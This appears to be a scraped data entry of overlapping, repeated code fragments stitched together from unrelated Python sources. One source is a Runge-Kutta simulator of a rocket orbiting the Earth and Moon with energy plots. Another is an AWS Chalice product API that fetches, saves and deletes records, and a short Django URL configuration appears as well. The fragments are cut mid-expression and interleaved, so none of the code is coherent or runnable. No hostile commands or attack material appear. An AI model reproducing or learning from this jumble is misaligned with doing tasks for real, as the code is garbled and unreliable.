np.zeros(N),", "rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if", "h * 0.5 * k1vy) k2vx = F3(x[i] + h * k1x *", "* (k1vy + 2 * k2vy + 2 * k3vy + k4vy) t[i+1]", "= F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h * k3x,", "Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy',", "F6(x[i] + h * k3x, y[i] + h * k3y) x[i+1] = x[i]", "r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2)", "print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight!", "(J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential", "rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the", "the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth", "ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting Earth')", "= 'Potential Energy', color = 'cyan') ax4.plot(t,Et, label = 'Total Energy', color =", "these two # Part B RK4 Implementation for i in range (0, N-1):", "(((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's", "a single position variable 'r' v = np.hypot(vx,vy) # Velocities in the x", "k4y = F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h *", "#Total energy is the sum of these two # Part B RK4 Implementation", "+ (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0", "Please enter initial velocities along the x and y axis (units are in", "+ 2 * k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y", "F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me * x *", "plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) 
ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis", "= 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4()", "of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d])", "(m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x", "fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y,", "'cyan') ax4.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax4.legend() plt.show() Exercise_4() Exercise_4()", "fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)')", "* 0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i] +", "def F6(x,y): return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 *", "Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE : print(\"\"\" \"Your rocket", "= F5(x[i] + h * k2x * 0.5, y[i] + h * k2y", "* y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def", "= 3.844e8 # Distance between Earth and the Moon (m) #dx/dt def F1(vx):", "k2vx) k3y = F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i]", "Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of", "k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx +", "/ (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm *", "#1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i])", "= np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = 
Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0]", "k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy", "+ h * 0.5 * k1vx) k2y = F2(vy[i] + h * 0.5", "(h/6) * (k1vy + 2 * k2vy + 2 * k3vy + k4vy)", "(-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x", "* k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5 *", "+ h * k3y) x[i+1] = x[i] + (h/6) * (k1x + 2", "h * k3y) k4vy = F4(x[i] + h * k3x, y[i] + h", "(m) Mm = 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass", "/ ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) / (((x**2)+(y**2))**(3/2))) def", "with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x = \")", "+ h * k3vy) k4vx = F3(x[i] + h * k3x, y[i] +", "--------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting", "position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0],", "PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 =", "for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i])", "Orbit Simulator! Please select which body you wish your rocket to orbit (enter", "(J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential", "Earth \\n 2. 
Moon\"\"\") choice = input() if choice == \"1\": # Starting", "np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x =", "#1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i])", "'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF')", "h * k3y) k4vy = F6(x[i] + h * k3x, y[i] + h", "= plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis", "A RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i])", "np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for your rocket:\"\"\") x0 =", "= input(\"x = \") y0 = input(\"y = \") # Starting Velocities (x,y)", "\\n 1. Earth \\n 2. Moon\"\"\") choice = input() if choice == \"1\":", "is set then start with x = 0, y = 7500)\"\"\") vx0 =", "= F2(vy[i] + h * k3vy) k4vx = F3(x[i] + h * k3x,", "* 0.5, y[i] + h * k2y * 0.5) k3vy = F6(x[i] +", "h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i]", "= vx[i] + (h/6) * (k1vx + 2 * k2vx + 2 *", "(units are in m): (I reccommend starting with x = 7x10^6 and y", "ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy',", "and y = 0)\"\"\") x0 = input(\"x = \") y0 = input(\"y =" ]
[ "django.urls import path from . import views app_name = 'blog' urlpatterns = [", "app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/',", "'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'),", "path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page, name='about'), ]", "from . import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'),", "import path from . import views app_name = 'blog' urlpatterns = [ path('',", "= [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page,", ". import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/',", "[ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about', views.about_page, name='about'),", "from django.urls import path from . import views app_name = 'blog' urlpatterns =", "urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page, name='reply'), path('about',", "path from . 
import views app_name = 'blog' urlpatterns = [ path('', views.post_list,", "views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'),", "import views app_name = 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail,", "= 'blog' urlpatterns = [ path('', views.post_list, name='post_list'), path('<slug:post>/', views.post_detail, name='post_detail'), path('comment/reply/', views.reply_page," ]
[ "Stats: def __init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp)", "stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci',", "= stats[3] self.samples = stats[1] self.low = [] self.high = [] for i", "= Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r',", "stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax,", "stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon')", "label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper left') plt.show()", "Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111)", "stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high = []", "color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = 
Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\")", "numpy as np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self,", "pickle import numpy as np import matplotlib.pyplot as plt import statistics class Stats:", "= Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax,", "stats[3] self.samples = stats[1] self.low = [] self.high = [] for i in", "Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g',", "variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201])", "self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples,", "def __init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean", "<reponame>ZhaomingXie/RLAlg import pickle import numpy as np import matplotlib.pyplot as plt import statistics", "= [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def", "def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1,", 
"alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig =", "matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with open (file,", "color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x',", "self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax,", "label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1", "self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig", "import statistics class Stats: def __init__(self, file): with open (file, 'rb') as fp:", "as plt import statistics class Stats: def __init__(self, file): with open (file, 'rb')", "(file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4]", "open (file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean =", "self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") 
stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\")", "stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax", "= [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g',", "statistics class Stats: def __init__(self, file): with open (file, 'rb') as fp: stats", "as np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file):", "self.samples = stats[1] self.low = [] self.high = [] for i in range(len(self.mean)):", "file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean = stats[2]", "class Stats: def __init__(self, file): with open (file, 'rb') as fp: stats =", "#self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high,", "stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples", "#ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 =", "import pickle import numpy as np import matplotlib.pyplot as plt import statistics class", "color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure()", "ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, 
color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1", "color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper left')", "plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax,", "color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 =", "= plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen')", "[] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self,", "fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3]", "= stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high =", "ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g',", "self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low", "stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') 
stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) ax.set_xlim([0,201]) plt.legend(loc='upper", "= fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition',", "variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\")", "np import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with", "range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label)", "fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen')", "self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low = [] self.high", "i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean,", "label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = 
Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2", "__init__(self, file): with open (file, 'rb') as fp: stats = pickle.load(fp) self.mean =", "stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low = []", "Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition',", "self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low,", "label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') stats_walker_contact_2.plot(ax, color='g', label='Walker_Partition', variance_color='lightgreen') plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))", "self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i)", "in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color,", "ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color) stats_walker_no_contact_1 = Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 =", "= stats[1] self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i])", "= pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples =", "with open (file, 'rb') as fp: stats = pickle.load(fp) 
self.mean = stats[2] self.noisy_mean", "plot(self, ax, color='g', variance_color='lightgreen', label=''): ax.plot(self.noisy_mean, color, label=label) #ax.fill_between(self.samples, self.low, self.high, alpha=1, color=variance_color)", "fig = plt.figure() ax = fig.add_subplot(111) stats_walker_no_contact_1.plot(ax, color='r', label='Walker_Non_Partition', variance_color='salmon') stats_walker_contact_1.plot(ax, color='g', label='Walker_Partition',", "self.std = stats[3] self.samples = stats[1] self.low = [] self.high = [] for", "for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, color='g', variance_color='lightgreen', label=''):", "stats[1] self.low = [] self.high = [] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i])", "import matplotlib.pyplot as plt import statistics class Stats: def __init__(self, file): with open", "= stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1] self.low =", "= Stats(\"stats/walker2d_no_contact_seed8_Iter201.stat\") stats_walker_contact_1 = Stats(\"stats/walker2d_contact_seed8_Iter201.stat\") stats_walker_contact_2 = Stats(\"stats/walker2d_contact_seed16_Iter201.stat\") fig = plt.figure() ax =", "plt import statistics class Stats: def __init__(self, file): with open (file, 'rb') as", "import numpy as np import matplotlib.pyplot as plt import statistics class Stats: def", "'rb') as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std", "as fp: stats = pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std =", "pickle.load(fp) self.mean = stats[2] self.noisy_mean = stats[4] self.std = stats[3] self.samples = stats[1]", "[] for i in range(len(self.mean)): self.low.append(self.mean[i]-self.std[i]) self.high.append(self.mean[i]+self.std[i]) #self.samples.append(i) def plot(self, ax, 
color='g', variance_color='lightgreen'," ]
[ "payload = app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\":", "@app.route('/') def index(): return {'hello': 'world!'} # http POST localhost:8000/products # http POST", "# http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list =", "if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid", "None} # http localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product", "@app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not payload: return { \"message\":", "{'hello': 'world!'} # http POST localhost:8000/products # http POST localhost:8000/products URL=\"https://bad-url.nogood\" # http", "# http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET']) def getProduct(productId): try: product_data = getProductDataByID(productId) if not", "\"productData\": None } if 'URL' in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return", "\"Invalid URL!\", \"productData\": None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return", "= cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data) except Exception as", "} return { \"message\": \"Success!\", \"productData\": product_data } # http localhost:8000/products/42 @app.route('/products/{productId}', methods=['GET'])", "# ] @app.route('/products', methods=['POST']) def saveProduct(): 
payload = app.current_request.json_body if not payload: return", "saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for", "None } product_data = cleanProductData(product_data) product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(product_data[\"media\"][\"images\"]) #product_data[\"media\"][\"uploadedImages\"] = uploadFromMediaUrls(image_list) try: saveProductData(product_data)", "URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\", #", "getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All commented lines are for debugging", "None } #product_data = {\"bad\": \"productData\"} if not productSchemaIsValid(product_data): return { \"message\": \"Invalid", "{ \"message\": \"URL not found!\", \"productData\": None } if 'URL' in payload: try:", "str(e), \"productData\": None } return { \"message\": \"Success!\", \"productData\": product_data } # http", "( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID ) app = Chalice(app_name='api-intent') # All", "localhost:8000/products/42/delete @app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return", "as e: return { \"message\": str(e), \"productData\": None } return { \"message\": \"Success!\",", "try: saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None }", "def getProduct(productId): try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not", "\"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data 
} except:#if not int", "return {\"message\": \"Product not found!\"} return { \"message\": \"Success!\", \"productData\": product_data } except:#if", "try: product_data = getProductDataByID(productId) if not product_data: return {\"message\": \"Product not found!\"} return", "# \"https://softgata.com/assets/svelte.svg\" # ] @app.route('/products', methods=['POST']) def saveProduct(): payload = app.current_request.json_body if not", "\"message\": \"Success!\", \"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\":", "\"productData\": product_data } except:#if not int return {\"message\": \"Missing ID!\", \"productData\": None} #", "# http localhost:8000/products/ @app.route('/products', methods=['GET']) def failProduct(): return {\"message\": \"Missing ID!\", \"productData\": None}", "saveProductData(product_data) except Exception as e: return { \"message\": str(e), \"productData\": None } return", "chalice import Chalice from chalicelib import ( productSchemaIsValid, cleanProductData, uploadFromMediaUrls, saveProductData, getProductDataByID, deleteProductDataByID", "localhost:8000/products URL=\"https://bad-url.nogood\" # http POST localhost:8000/products URL=\"https://raw.githubusercontent.com/ClimenteA/Python-Chalice-AWSLambda-APIGateway/main/retailer-data.json\" # image_list = [ # \"https://softgata.com/assets/django.png\",", "app.current_request.json_body if not payload: return { \"message\": \"URL not found!\", \"productData\": None }", "= Chalice(app_name='api-intent') # All commented lines are for debugging # app.debug = False", "@app.route('/products/{productId}/delete', methods=['GET']) def deleteProduct(productId): try: deleteProductDataByID(productId) return {\"message\": \"Product deleted!\"} except: return {\"message\":", "in payload: try: product_data = requests.get(payload[\"URL\"]).json() except: return { \"message\": \"Invalid URL!\", \"productData\":", "debugging # app.debug = False # http 
